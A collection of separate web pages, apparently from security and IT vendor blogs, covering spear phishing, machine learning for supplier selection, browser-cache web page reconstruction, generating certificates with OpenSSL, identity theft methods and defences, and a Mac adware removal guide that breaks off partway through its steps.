When scammers realized phishing really worked, they got more sophisticated. By doing a little bit of investigation, they are often able to determine the job title, business role and other details of an individual. With that information in hand, they can conduct targeted attacks, which are known as spear phishing. By providing a plausible-sounding story with enough details, the spear phisher can trick a person into responding with confidential information or details that will help them access private networks. Specific attacks might impersonate a known individual such as the CEO (easily determined from most company websites) and ask for specific vital information in a hurry. After all, who ignores an urgent request from the CEO?
Some attempts work the other way around, targeting the C-level executives at a company with spear phishing. This is known as whaling. Disguised with a sense of urgency and often including details of business transactions or alleged issues with the company (all based on publicly available information), the whaling attack attempts to convince the target to do something like click on a link. The supposed urgency or seriousness of the situation compels the individual to ignore normal security precautions and common sense.
While spam and junk email filters do a good job of removing the most obvious generalized phishing attacks, spear phishing and whaling attacks often come in as normal emails with none of the telltale signs of a clumsy cyberattack.
The only real defense against these is security training and a healthy suspicion of all electronic communication. Several organizations have recently discovered the drastic consequences of falling for phishing or another social engineering attack. | <urn:uuid:9a5f43ef-2e2b-4077-ae03-420a0f925d82> | CC-MAIN-2022-40 | https://entint.com/blog/cybersecurity/nine-it-vulnerabilities-and-threats-you-may-not-know-about/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00341.warc.gz | en | 0.958779 | 478 | 2.859375 | 3 |
You have seen the Hollywood interpretations of artificial intelligence (AI). There is the evil AI we remember from HAL in “2001 – a Space Odyssey” through “War Games” to SkyNet in the “Terminator” film series. And there is the good or at least well-meaning AI in “I, Robot” and “A.I. Artificial Intelligence”.
But what about AI in the real world? Isn’t that something that was hot 15 years ago, but we haven’t heard much of since? Is AI actually used for anything practical these days? Well, yes and no. In fact, many of the technologies that stem from AI research are used quite frequently today, but they are rarely called AI. One example would be the electronic “customer service agent/avatar” seen on many web sites—they often use AI disciplines such as case-based reasoning, machine learning, and natural language processing. Or perhaps you remember the Tamagotchi? Or control systems, robots, air traffic control, or…
What about business applications then?
If AI can find practical use in a wide range of applications, what about automating some of the decisions that we do manually in our businesses today? Or what about using AI to provide a better alternative to rule-based processing which we use so much of in our business applications?
Under the umbrella of IFS Labs, we put that very question to two students from the Chalmers University of Technology. Over the past few months, they have, as their Master’s thesis, studied possible approaches, evaluated potential use cases, built a prototype for one of them, and tested it on actual data from an IFS customer.
After evaluating a handful of scenarios, they decided to try applying machine learning to the scenario of selecting which supplier to buy a certain part from when there is more than one supplier that can provide that same part. Most organizations today either select a supplier manually or use very simple rules, such as always buying from the default supplier unless it is out of stock, in which case another supplier is used. It is reasonable to assume that such simple rules, or manual choices, will not be optimal for large volume purchases.
The idea was that after some initial training (where the most skilled buyers make the choice) the AI would learn how various factors such as price, lead time, delivery accuracy, and quality affect the choice. The AI would then be able to pick the supplier automatically, or, for those who are less willing to trust in machines, show a recommendation to the buyer who then makes the final decision.
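The article does not spell out which algorithm the students used, so the following is only an illustrative sketch in Python with scikit-learn: each candidate supplier on a past purchase line is described by a few features, labelled with whether the skilled buyer actually chose it, and a classifier is trained on those labels so new candidates can be scored. All feature names, values, and supplier names here are made up.
# Illustrative sketch only; feature values and supplier names are hypothetical.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
# One row per candidate supplier on a past purchase line:
# [price, lead_time_days, delivery_accuracy, quality_score]
X_train = np.array([
    [10.5, 7, 0.98, 4.5],
    [9.8, 21, 0.80, 3.9],
    [11.0, 5, 0.99, 4.8],
    [12.3, 14, 0.90, 4.0],
])
# Label is 1 if the skilled buyer chose that candidate, otherwise 0
y_train = np.array([1, 0, 1, 0])
model = RandomForestClassifier(n_estimators=50, random_state=0)
model.fit(X_train, y_train)
# For a new purchase line, score each candidate supplier and recommend the best one
candidates = {
    "supplier_a": [10.2, 10, 0.95, 4.2],
    "supplier_b": [9.5, 25, 0.78, 3.7],
}
scores = {name: model.predict_proba([feats])[0][1] for name, feats in candidates.items()}
print(max(scores, key=scores.get))
The same per-candidate scores, tracked over time, are also what makes the supplier-trend observation below possible.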
The findings? Well, with just a little training the AI managed to make decisions with a low error rate. It was also stable enough not to be thrown by some errors or “wrong decisions” in the training data. The algorithms used also turned out to have some other interesting uses. For example, as a side effect, they identify trends among suppliers, for example, whether a certain supplier tends to get picked (for reasons of price, quality etc.) more or less frequently. This can provide valuable intelligence for purchasers to see which suppliers to phase out, re-negotiate deals with etc.
Confirmed or Busted?
Is the idea of using AI for automation of business decisions confirmed or busted? In myth-busters terminology, I would have to say plausible.
The problem is not with the AI itself—the algorithms developed work well—but with the scenario and real-life data quality. For this to work well (and be worthwhile) you need a high volume of decisions where there are multiple choices and up-to-date values for all variables that may affect the decision. Taking the “choice of supplier” scenario as an example, a lack of up-to-date price or lead time information for all alternative suppliers would lead to decisions made on wrong assumptions.
Actually, the students successfully tested the algorithm on a purchase of home electronics, where exactly the same product can be bought from a large range of suppliers, and online price comparison sites provide accurate information about price, available quantity, supplier quality rating etc. Unfortunately, there are not many industries or product categories where this data is as readily available.
There are other potential applications, for example in manufacturing when allocating resources during production line planning, AI could aid in selecting the best resource for a particular job. This can be done based on various features, such as availability, reliability, production speed, deadlines and other requirements. The algorithm will learn preferences of resource allocation and apply them to new cases. The advantage of using the algorithm over traditional planning would be that it could consider more features than a human planner, and can learn from evidence rather than stick to fixed algorithms used by automatic planning engines.
Do I think it could work? Yes, I do. Do I know in what business process, and for what decisions, it would be truly useful in real life? No, I don’t. If you do – drop me a line. We might just go ahead and try it. | <urn:uuid:f547889f-0c20-4127-b943-85a3d5a4f198> | CC-MAIN-2022-40 | https://blog.ifs.com/2012/11/i-robot-can-artificial-intelligence-play-a-role-in-business-applications/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00341.warc.gz | en | 0.956668 | 1,036 | 2.921875 | 3 |
Web page reconstruction is a vital feature of any forensic software used for analysing browser history. Web page reconstruction is the process of using HTML and other resources stored in the web browser cache to rebuild a web page, allowing it to be easily viewed in the state it was originally seen by the user. This can be a great piece of visual evidence to include in a report, as we all know "a picture is worth a thousand words".
We have had web page reconstruction functionality built into our tools FoxAnalysis and ChromeAnalysis for many years. However, when designing our new tools Browser History Viewer (BHV) and Browser History Examiner (BHE) we wanted to make this functionality easier to use and more reliable.
A great research paper on this topic from the University of Amsterdam, in partnership with the Netherlands Forensic Institute, is titled ‘Reconstructing web pages from browser cache’. The research paper examined and tested the different methods of reconstructing a web page from the browser cache. Chapter 3.1 "Pre- or Post-processing" details the two methods available:
Pre-processing occurs before the rendering browser has accessed the web page. It involves parsing all resource identifiers such as images, stylesheets, and scripts within the HTML document and updating their URLs to point to the local cached version. For example, the Google search results page includes the Google logo, which is represented in the HTML document with the following image tag:
<img width="167" height="410" alt="Google" src="/images/nav_logo242.png">
During pre-processing the cached image ‘nav_logo242.png’ would be extracted from the browser cache, and the ‘src’ URL would be updated to point to this local file.
Post-processing occurs after the rendering browser has accessed the web page. It involves intercepting all HTTP requests for external resources from the rendering browser. If the requested resource is available within the browser cache then it is extracted and included in the response to the request. Post-processing therefore behaves in a similar manner to a proxy server.
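To make the difference concrete, below is a minimal Python sketch of the pre-processing approach (this is not how BHV or BHE work internally, since they use post-processing, and the lookup table and file paths are purely hypothetical). It rewrites src and href attributes to point at files already extracted from the cache; any resource identifier the rewrite misses would still be fetched from the live internet, which is one of the disadvantages listed next.
# Minimal pre-processing illustration; a real tool would use a proper HTML parser.
import re
def preprocess(html, cache_lookup):
    # cache_lookup maps an original resource URL to a locally extracted cache file
    def rewrite(match):
        url = match.group(2)
        return match.group(1) + cache_lookup.get(url, url) + match.group(3)
    return re.sub(r'((?:src|href)=")([^"]+)(")', rewrite, html)
html = '<img width="167" height="410" alt="Google" src="/images/nav_logo242.png">'
print(preprocess(html, {"/images/nav_logo242.png": "cache/nav_logo242.png"}))
# -> <img width="167" height="410" alt="Google" src="cache/nav_logo242.png">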
The disadvantages of the pre-processing method are as follows:
1. It requires modifying a copy of the original evidence
3. Any resource identifiers which are not parsed may result in the original resources being downloaded over the internet
Through testing with a proof of concept, the research paper concluded that "post-processing leads to more complete results without tampering with the evidence".
The research paper also examined existing tools capable of reconstructing web pages and at the time of writing (July 2013), stated that they all used the pre-processing method. This included NetAnalysis (Digital Detective), Internet Examiner v3 (SiQuest) and our own tools FoxAnalysis and ChromeAnalysis.
During testing against existing tools, the research paper stated that "comparing the results between this research and existing tools shows that the post-processing mechanism handles every resource request whereas pre-processing manages this only partly".
When developing BHV and BHE we chose to implement the post-processing method of reconstructing web pages in order to ensure a more reliable process. We also made it easier to view rebuilt web pages by separating them into a 'Cached Web Pages' tab and embedding a web browser within the application. The web browser uses the WebKit rendering engine and is therefore capable of displaying modern web sites.
To see our web page reconstruction in action visit our Downloads
page for a free trial of Browser History Examiner, or to grab our free forensic tool, Browser History Viewer. | <urn:uuid:e73b3a15-9ff0-421f-9a91-18b7e176be18> | CC-MAIN-2022-40 | https://www.foxtonforensics.com/blog/post/web-page-reconstruction-for-forensic-analysis | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00341.warc.gz | en | 0.892528 | 813 | 3.171875 | 3 |
OpenSSL has been one of the most widely used certificate management and generation pieces of software for much of modern computing.
OpenSSL can also be seen as a complicated piece of software with many options that are often compounded by the myriad of ways to configure and provision SSL certificates.
OpenSSL is usually included in most Linux distributions. In the case of Ubuntu, simply running apt install openssl will ensure that you have the binary available and at the newest version. OpenSSL on Windows is a bit trickier, as you need to install a pre-compiled binary to get started.
One such source providing pre-compiled OpenSSL binaries is the following site by SLProWeb. Offering both executables and MSI installations, the recommended end-user version is the Light x64 MSI installation. The default options are the easiest to get started.
Verify that the installation works by running the following command. Note that this command was run in the PowerShell environment (hence the & preceding the command).
& "C:\\Program Files\\OpenSSL-Win64\\bin\\openssl.exe" version
To make running this command easier, you can modify the path within PowerShell to include the executable's folder: $Env:Path = $Env:Path + ";C:\Program Files\OpenSSL-Win64\bin"
Provisioning a Certificate
There are many different ways to generate certificates, but the use cases that usually come up are the following.
- Self-Signed Certificates
- Certificate Signing Requests (CSR)
- Checking Certificate Information
A common server operation is to generate a self-signed certificate. There are many reasons for doing this, such as testing or encrypting communications between internal servers. The command below generates a private key and certificate (a non-interactive variant is sketched after the parameter breakdown).
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:4096 -keyout private.key -out certificate.crt
Let's break down the various parameters to understand what is happening.
- req - Command passed to OpenSSL intended for creating and processing certificate requests usually in the PKCS#10 format.
- -x509 - This option tells OpenSSL to output a self-signed certificate rather than a certificate request, somewhat like acting as its own certificate authority. X.509 refers to the certificate format defined in RFC 5280.
- -sha256 - This is the message digest (hash) used when signing the certificate.
- -nodes - Short for "no DES", which means that the private key will not be encrypted with a passphrase.
- -days - The number of days that the certificate will be valid.
- -newkey - The type and size of the key to generate, in this case a 4096-bit RSA key.
- -keyout - The location to output the private key of the self-signed certificate.
- -out - The location to output the certificate file itself.
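By default, the req command prompts interactively for subject fields such as country, organization, and common name. If you need to script certificate creation, the -subj option can supply those values on the command line; the values below are placeholders rather than a recommendation.
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:4096 -subj "/C=US/ST=State/L=City/O=Example Org/CN=example.local" -keyout private.key -out certificate.crt
On OpenSSL 1.1.1 and newer, the -addext option can additionally be used to add extensions such as a subject alternative name (for example -addext "subjectAltName=DNS:example.local"), which many modern clients check instead of the common name.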
Once the certificate has been generated, we should verify that it is correct according to the parameters that we have set.
openssl x509 -in certificate.crt -text -noout
The parameters here are for checking an x509 type certificate. The combination allows the certificate to be output in a format that is more easily readable by a person.
- x509 - This is a multipurpose command, and when combined with the other parameters here, it is for retrieving information about the passed in the certificate.
- -in - The certificate that we are verifying.
- -text - Prints the certificate details in a human-readable text form.
- -noout - Suppresses output of the encoded (Base64) form of the certificate.
Certificate Signing Request
The next most common use case of OpenSSL is to create certificate signing requests for requesting a certificate from a certificate authority that is trusted.
openssl req -new -newkey rsa:2048 -nodes -out request.csr -keyout private.key
Similar to the previous command to generate a self-signed certificate, this command generates a CSR. You will notice that the -x509, -sha256, and -days parameters are missing. By leaving those off, we are telling OpenSSL that another certificate authority will issue the certificate. In this case, we keep the -nodes option so that the private key is not protected with a passphrase.
To verify that the CSR is correct, we once again run a similar command but with an added parameter, -verify. This command will validate that the generated CSR is correct. This is a prudent step to take before submitting to a certificate authority.
openssl req -in request.csr -text -noout -verify
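One further check that often proves useful (assuming RSA keys, as generated in the examples above) is confirming that a private key actually matches a certificate or CSR. A common way is to compare a hash of each file's modulus; if the digests for the key and its certificate (or CSR) are identical, they belong together.
openssl x509 -noout -modulus -in certificate.crt | openssl md5
openssl rsa -noout -modulus -in private.key | openssl md5
openssl req -noout -modulus -in request.csr | openssl md5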
OpenSSL is a complex and powerful program. Although this article just scratches the surface of what can be done, these are common and important operations that are generally performed by system administrators. There is much more to learn, but with this as a starting point, an IT professional will have a great foundation to build on! | <urn:uuid:e01945aa-f62a-4547-9f22-c8010dca6229> | CC-MAIN-2022-40 | https://www.ipswitch.com/blog/how-to-use-openssl-to-generate-certificates | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00341.warc.gz | en | 0.892755 | 1,043 | 2.984375 | 3 |
The cyber world is changing, and it is more crucial than ever to proactively protect yourself from prying eyes. Technology-driven digitalization, the proliferation of endpoints, and more remote access to data in this competitive world equal increased opportunities for tech-savvy attackers. Though identity theft is one of the oldest crimes, the attacking tools are becoming more sophisticated, and the attackers are out in force, enjoying an easy time stealing personal data. Attackers can effortlessly exploit endpoint vulnerabilities with new skimming technologies that can penetrate the device’s window of exposure. The attacking methods used by criminals are plentiful, and they continue to evolve, making identity theft one of the fastest-growing crime problems.
Untangling the mess from identity theft can be very challenging, and it can be difficult to spot early warning signs. Fraudsters take advantage of businesses as well as individuals. For corporations, remediating the problem can be a long and expensive task. So, it is vital to stay alert to potential identity theft, and your vigilance starts with educating yourself on the most prevalent ways identity thieves get hold of your data. There is no way to immunize yourself against identity theft completely. All you can do is be well equipped to shield your personal data, know what identity thieves can do with it, and act swiftly if someone manages to steal it.
What is meant by identity theft?
Identity theft is a crime that involves stealing an individual’s personal or financial information without their knowledge, which is later used for fraudulent purposes. Usually, any personally identifiable information that can be used to access a person’s financial resources, like an individual’s name, date of birth, address, bank account number, credit card number, social security number, medical insurance account number, electronic signature, fingerprint, driver’s license number, passport number, PINs, and passwords, can be compromised in identity theft. Identity theft is a very serious crime, and it can happen to anyone.
Identity thieves deliberately use the stolen identity for credit, merchandise, or financial gain in the name of another person, and the victims sometimes suffer adverse consequences that can rapidly spiral out of control as they are unknowingly held responsible for the perpetrator’s activities. The victim’s creditworthiness, reputation, and data privacy will be damaged by any transactions or purchases made by the imposter, which costs them a massive amount of money, effort, and emotional distress. The thieves may sometimes pass the stolen information to a crime ring. Tiding over the consequences may take anywhere from a single day to several months or years, accompanied by constant investigations and long-term assistance.
How identity theft occurs?
Identity theft is committed in various ways. Due to the nature of the technologies used for identity theft, personal information is at risk anytime. Criminals are increasingly using computer technologies and becoming more creative in how they steal your identity. Understanding how identity theft occurs helps you better stay vigilant and identify what kind of data is to be protected. The techniques used range from mere shoulder surfing to high-end social engineering methods used to access corporate databases.
Identity theft methods:
- Shoulder surfing – Thieves discreetly glean information when people fill out personal information on forms, and peer over their shoulder when they type sensitive information such as passwords on a keypad, enter a credit card number on a phone or computer, or enter an ATM PIN. They may also listen in on the victim’s calls to steal personal information. This usually occurs in crowded public places where observing others is comparatively easy.
- Mail theft – Thieves sift directly through the victim’s mailbox to access mail containing credit card bills, bank statements with the account number, tax forms with a social security number, or other documents containing personal information. Digging through discarded mail to find receipts containing personal information is a method that has been used for identity theft since long before the advent of the internet. Bank statements and credit card information sent through the post can also be vulnerable to theft. Information can even be stolen from computer-based public records.
- Malware – Malware or malicious software can be designed to steal essential data from the device on which it is installed or spy over the user’s online activities to steal their personal information. Malware like viruses, trojans, spyware, or keyloggers are commonly used for this, and they find open doors for the thieves to get their hands on the data residing on the system. Criminals sometimes hack devices in a network to access systems and databases to obtain personal information in bulk.
- Phishing – Phishing is a process where scammers use deceptive emails to trick people and steal sensitive information. Different forms of malware come attached to phishing emails, and sometimes links to fraudulent or spoofed websites are attached where users are prompted to type in their personal information. Sometimes the victim is tricked into filling out a data collection form in which important personal information is disclosed. Phishing emails typically look like legitimate messages from a reputed source, so people easily fall victim. Only rarely does the fishy email contain spelling or grammatical mistakes, appear to come from an unofficial email address, or include an urgent request, so it isn’t easy to spot. Scammers also use SMS text messages, phone calls, and other forms of electronic communication, besides stealing or diverting mail, to impersonate trusted organizations.
- Phone scams – Identity thieves directly make a call pretending that they are from a bank or other reputed firms and prompt users to share their bank account details and other personal information.
- Dumpster diving – Thieves sometimes sifts through garbage cans to get useful information. Retrieving people’s discarded file documents from trash dumpsters is an easy method used for identity theft. Pre-approved credit cards are often thrown unopened to garbage without proper shredding, which opens up an opportunity for credit card theft. Discarded checks, health insurance cards, and tax-related documents are other vital data that are accessed by rummaging through the rubbish.
- Wi-Fi hacking – Public Wi-Fi doesn’t properly encrypt the data flowing through it. So, having the Wi-Fi password, criminals can easily snoop on data traveling to and from other people’s devices and intercept the personal information which people send through a public Wi-Fi network. Criminals sometimes create their own fake Wi-Fi hotspots in public places to attract people to use them and thereby easily get access to their devices. In other cases, attackers use different tools to hack private Wi-Fi networks that are unencrypted and don’t have a VPN in use, in order to steal data.
- Skimming – Skimming devices are placed over an ATM or card readers at a point-of-sale. Here the actual card reader is replaced by a counterfeit device that captures the data contained in the magnetic strips of debit cards or credit cards and shares them with the fraudsters. Sometimes a small camera will be attached to capture ATM PINs and ZIP codes.
- Card information cloning – The card readers copy the information contained in the magnetic strip of a debit or credit card and use a counterfeit card with the same details to make payments.
- Direct stealing – Identity thieves grab and go valuable data typically by pickpocketing or housebreaking. For instance, they may steal misplaced cheques to obtain bank code and account number.
- Insider theft – Insider job of identity theft in the workplace is a common challenge for organizations handling the personal information of their customers. Dishonest employees who have access to the database may intentionally steal customer data to hand it over to other fraudsters or sell it in the dark web marketplace.
- Data breach – Data breach is a steadily growing crime, and a portion of the data breach victims have their identities stolen as well. When some unauthorized ones gain access to a corporate’s sensitive data, customer data is one of the valuable information that could be easily stolen.
Get to know the warning signs for identity theft
It’s really frustrating that identity theft can remain unnoticed for a long time, as thieves are clever and cunning in their operations. However, it is important to spot potential fraud before it becomes a major threat. Here are some warning signs which indicate that an identity has been stolen:
- Unexplained withdrawals from bank accounts
- Impacted credit score and inexplicable denial of credit in spite of having high credit rates
- Not receiving bills or other important emails containing sensitive data
- Receiving bills or payment reports for unknown accounts
- Fake accounts and false charges on the credit report
- Rejection of health plans due to unknown reasons
- Unusual IRS notifications that multiple tax returns are filed under a person’s name or income data from an unknown employer
- A data breach on a company that stores the victim’s personal information
- Getting bills for strange purchases or credit card statements for unrecognized sign-ups
- Unauthorized bank transactions
- Denial of electronic tax filing
- Receiving authentication texts and emails from unknown accounts
- Getting bills for unrecognized healthcare benefits
- Getting unnecessary calls from debt collectors for overdue
- Job opportunities unexpectedly fall through after the prospective employer runs a credit check
Some recent statistics
Fraud reports from the Federal Trade Commission’s Consumer Sentinel Network clearly show a steady increase in the rate of identity theft in recent years.
Here is a quick overview of the identity thefts reported by subtype
|Theft subtype||2019 Q4||2020 Q1||2020 Q2||2020 Q3|
|Debit card, Electronic funds transfer, or ACH||6374||6832||8191||7660|
|Employment or wage-related fraud||4011||6158||7534||6714|
|Email or social media||2844||3029||3681||3800|
|Online shopping or payment account||3028||3343||3969||3903|
Different types of identity theft
Identity theft is a broad term which involves various forms, the most common among which are listed below:
- True-name identity theft – Fraudsters steal another person’s data and open new accounts or services in their name. They may establish new cellular phone service, start a new credit card account, or open a new banking account to get blank checks.
- Account takeover identity theft – Fraudsters gain access to the victim’s existing account by means of the stolen identities. Once they get access to the victim’s account, they change the email address associated with it and make all transactions before the victim realizes the threat.
- Criminal identity theft – Fraudsters commit crimes and provide stolen identities to the police when they get arrested for disguising themselves as another individual. Criminals either submit government issued identity documents or a fake ID to prove themselves as the other individual. So, in police records, the identity theft victim will be charged, letting the actual culprit off the hook. Criminal identity theft can sometimes have a long-lasting effect that even when the victim can somehow manage to prove his innocence before the police and judiciary, they may encounter problems due to bad background in the future as some data aggregators may still have false criminal records in the victim’s name.
- Medical identity theft – Fraudsters steal medical information like health insurance information for receiving medical services or prescription drugs or to get access to the medical records of other people. All the fake details will be added to the victim’s account and the health insurance provider of the victim may receive unknown bills.
- Tax identity theft – Fraudsters file a tax return under someone else’s identity and nab the refund, which is directly deposited into a bank account controlled by the thief. It is done by using the person’s name, address, and social security number. The victim may not know until they try to file a tax return.
- Social identity theft – Fraudsters use social media platforms for identity theft. They may befriend people on social media platforms and trick them into sharing their personal information. Sometimes, the thieves go to the next level by creating a phony account in the name of another person and committing all their fraudulent activities from that account, so that the victim will be blamed for any consequences.
- Child identity theft – Child identity theft is a form of identity theft that often remains unnoticed for a long time. Imposters steal minor’s identity, including social security numbers, when they do not have any data associated with them. Children’s information is misused to apply for bank accounts, establish a line of credit, receive government benefits, and take out loans.
- Senior identity theft – Senior identity theft is a form of identity theft that targets people over the age of 60. Senior may be unaware of the evolving techniques used by criminals and hence easily fall victim to such kind of attacks. To add, seniors are more likely to be in contact with medical care and health insurance units who stores a large amount of personal and financial information which makes them an attractive target for identity theft.
- Synthetic identity theft – In synthetic identity theft, fraudsters fabricate a new fake identity sometimes by combining the personally identifiable information of multiple identities which makes it the most difficult form of identity theft to track. This type of identity theft is more common in recent days, and the method may involve partial or complete fabrication.
- Financial identity theft – Any form of identity theft involves financial gains, and financial identity theft can be said a part of any other identity theft attempts. Financial theft is when the stolen identity is solely used for monetary gains like payment fraud, credit card fraud, new bank account openings, taking loans, and getting goods and services claiming to be someone else.
Impacts of identity theft
Identity thieves can benefit from personal information in a variety of ways. Though businesses are far more tempting targets for identity theft than independent individuals, both individuals and businesses are equally likely to suffer harmful repercussions following identity theft. Identity theft can bring immediate financial loss or gradual damage to the credit status of the victim, depending on the type of data stolen and the way the thieves use it. Technology has exacerbated the identity theft problem; only a victim can truly understand how devastating the effect can be, both economically and emotionally.
Some serious aftereffects of identity theft:
- Criminals use stolen employee identification numbers to submit false income and withholding documents to get refunds.
- In the first place, victims probably get little to no assistance from the authority which has issued the identity document.
- There are so many identity fraud cases reporting that it is less likely to get immediate investigation assistance from law enforcement.
- In order to prove their innocence to the authorities, victims may often have to show the police report.
- Flagging the credit report for fraud may not always stop fraudsters from obtaining more credit.
- Victims must deal with abusive collection agencies.
- Businesses have to spend a significant amount of time cleaning up the mess from identity theft.
- Individuals, as well as organizations, suffer huge financial losses.
- Sometimes the thief may commit a crime in the victim’s name and the entire burden of those crimes falls on the shoulders of the victim.
- Attackers purchase items, spend money from the victim’s account, and even steal the superannuation of employees.
- Thieves may change the victim’s password and contact information for accounts, making the victims unable to recover their account.
- Stolen information sometimes ends up on the dark web, which makes the situation even worse.
- Attackers access the victim’s social media accounts to target their family and friends for the next session.
- Identity thieves take out the victim’s phone plans and other contracts.
Identity theft protection
The public often learns of a problem only when the worst has already happened. Lack of proper cyber hygiene is a major cause of most high-profile identity theft cases. A proactive, defense-in-depth security approach is the key to protecting yourself from the all-too-common occurrence of identity theft and to mitigating the risks it causes. Here is a compiled list of some of the most effective countermeasures that individuals as well as organizations can adopt to defend against possible identity theft:
- Businesses should use an identity and access management solution
Whether you are a big, small, or medium-sized organization, adopting an IAM (Identity and Access Management) solution is as vital as any other well-known security practice for preventing identified vulnerabilities and exposure. Identity and access management offers tools and policies to manage identities and control user access within an organization. This ensures that only authorized users within the organization are accessing sensitive data.
Most IAM solutions offer role-based access control with additional authentication options like single-sign-on and multi-factor or two-factor authentication. IAM also involves basic security etiquettes like enforcement of password and maintaining proper password hygiene, mandating the use of VPN, data encryption, compliance checks, virtual containerization of work data, and remote monitoring.
With the use of IAM, organizations can eliminate the instances of identity theft by preventing the spread of compromised login credentials and avoiding malicious entry to the organization network. The best option is to go with a UEM (Unified Endpoint Management) solution that offers a harmonized set of security services apart from the identity and access management, which altogether can employ a multi-layer threat defense.
- Monitor credit activity and financial statements
Many banks offer continuous credit card monitoring for its customers. Customers should take advantage of this and bank statements should be scanned for purchases that seem unusual.
- Nurture and practice good cybersecurity hygiene
Think before responding to emails from unfamiliar sources and be on alert while opening email attachments. Never share personal information to unauthorized websites. Use only secure websites.
- Shred important documents
Dumped hard copies of documents are the most underrated attack vector used by identity thieves. Be sure to shred all the important identity documents once you discard them after use.
- Be cautious on social media
Always set social media account to private. Be extremely careful when making new friends on social media platforms and be wary of the personal data you share there.
- Avoid carrying Social Security Card around
- Avoid the use of public Wi-Fi, especially while making online transactions. Avoid sharing sensitive information online if possible.
- Wipe all personal information or make the hard drive unreadable before dispensing old computer and mobile devices.
- Check state and national criminal databases to confirm you don’t have any unknown criminal cases reported in your name.
- Keep photocopies of credit cards, debit cards, and all other personal information so that even if they are stolen, you’ll have all the data readily available.
- Organizations should provide awareness to employees to easily identify threat patterns and practices.
If you suspect or are particularly worried about identity theft, immediately freeze your accounts, change your passwords, and report it to the authorities. Organizations should flag the incident to let customers know that their data has been compromised. | <urn:uuid:c5373a4c-d155-46ef-8de5-849b85a2fec6> | CC-MAIN-2022-40 | https://www.hexnode.com/blogs/identity-theft-how-to-not-be-the-next-victim/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00541.warc.gz | en | 0.916312 | 3,974 | 2.6875 | 3 |
In addition to other operating systems that are being targeted by threats, Mac computers are also subject to malicious software attacks. Ad-supported, or adware, software has been infecting Mac computers. Lots of adware apps are spreading in order to inject misleading ads and pop-ups and generate online revenue. An example of advertising software that infects Mac computers is called AccessDefault. The installation of this adware will negatively affect the operation of the Mac computer and its browser application.
Is AccessDefault app harmful?
AccessDefault is a harmful adware program that floods the browser with aggressive ads and annoying pop-ups and redirects. Advertisements are persistently shown in the browser while Mac users are surfing the internet. Continuous occurrences of ads and pop-ups can make browsing slow. Such a situation will leave Mac users distracted while doing their online browsing. Furthermore, AccessDefault may inflict browser redirects, leading pages to questionable sites.
The impact of AccessDefault on Mac computers may not be a big issue compared to virus infections. However, the presence of AccessDefault may leave Mac computers open to other malware contamination. It may install additional programs or extensions onto Mac computers that can cause further damage. Mac users should avoid installing AccessDefault on their Mac computers in order to prevent any potential hazards. One other thing: scanning the system with updated antivirus software is a good idea to delete AccessDefault from compromised Mac computers.
How AccessDefault adware enters Mac?
In some instances, AccessDefault’s entry onto Mac computers is rather strange. The reason is that this unusual browser extension typically gets into Mac computers without permission from Mac users. This is likely due to the installation of other malicious programs. There is downloadable software which automatically installs additional apps during the setup process. Mac users should closely inspect the entire installation procedure to detect unwanted applications that attempt to invade macOS. Furthermore, Mac users must be careful about which software they install; it may include AccessDefault or other malware.
Procedures to Remove AccessDefault from Mac
This area contains comprehensive procedures to help you remove adware and potentially unwanted programs from the computer.
The guides on this page are written in a manner that can be easily understood and executed by Mac users.
Quick Fix - Scan the Mac Computer with Combo Cleaner
Combo Cleaner is a trusted Mac utility application with complete antivirus and optimization features. It is useful in dealing with adware, malware, and PUPs. Moreover, it can get rid of adware like AccessDefault. You may need to purchase the full version if you want to make the most of its premium features.
1. Download the tool from the following page:
2. Double-click the downloaded file and proceed with the installation.
3. In the opened window, drag and drop the Combo Cleaner icon onto your Applications folder icon.
4. Open your Launchpad and click on the Combo Cleaner icon.
5. Wait until antivirus downloads its latest virus definition updates and click on "Start Combo Scan" to start removing AccessDefault.
6. Free features of Combo Cleaner include Disk Cleaner, Big Files finder, Duplicate files finder, and Uninstaller. To use antivirus and privacy scanner, users have to upgrade to a premium version.
Proceed with the rest of the removal steps if you are comfortable in manually removing malicious objects associated with the threat.
Step 1 : Delete AccessDefault from Mac Applications
1. Go to Finder.
2. On the menu, click Go and then, select Applications from the list to open Applications Folder.
3. Find AccessDefault or any unwanted program.
4. Drag AccessDefault to Trash Bin to delete the application from Mac.
5. Right-click on Trash icon and click on Empty Trash.
Step 2 : Remove Browser Extensions that belongs to AccessDefault
1. Locate the add-on or extension that is relevant to the adware. To do this, please follow the following depending on affected browser.
Safari - Choose Preferences from the Safari menu, then click the Extensions icon. This will open a window showing all installed extensions.
Chrome - Select Preferences from the Chrome menu, and then click the Extensions link found on the left pane.
Firefox - Choose Add-ons from the Menu. Look at both the Extensions and Plug-ins lists when it opens a new window.
2. Once you have located AccessDefault, click on Remove or Uninstall, to get rid of it.
3. Close the browser and proceed to the next steps.
Step 3 : Delete Malicious Files that have installed AccessDefault
1. Select and copy the string below to your Clipboard by pressing Command + C on your keyboard.
2. Go to your Finder. From the menu bar please select Go > Go to Folder...
3. Press Command + V on your keyboard to paste the copied string. Press Return to go to the said folder.
4. You will now see a folder named LaunchAgents. Take note of the following files inside the folder:
The term unknown is just a representation of the actual malware name. Attackers may mask the actual name with the following:
- AccessDefault Daemon
If you cannot find the specified file, please look for any unfamiliar or suspicious entries. It may be the one causing AccessDefault to be present on your Mac. Arranging all items to see the most recent ones may also help you identify recently installed unfamiliar files. Please press Option + Command + 4 on your keyboard to arrange the application list in chronological order.
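If you are comfortable with Terminal, listing the launch item folders sorted by modification time is another way to spot recently added entries. This is only a convenience sketch; contents vary between systems and some of these folders may not exist on every Mac.
ls -lt ~/Library/LaunchAgents
ls -lt /Library/LaunchAgents /Library/LaunchDaemons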
Important: Take note of all the suspicious files as you may also delete the same item on another folder as we go on.
5. Drag all suspicious files that you may find to Trash.
6. Please restart the computer.
7. Open another folder using the same method as above. Copy and Paste the following string to easily locate the folder.
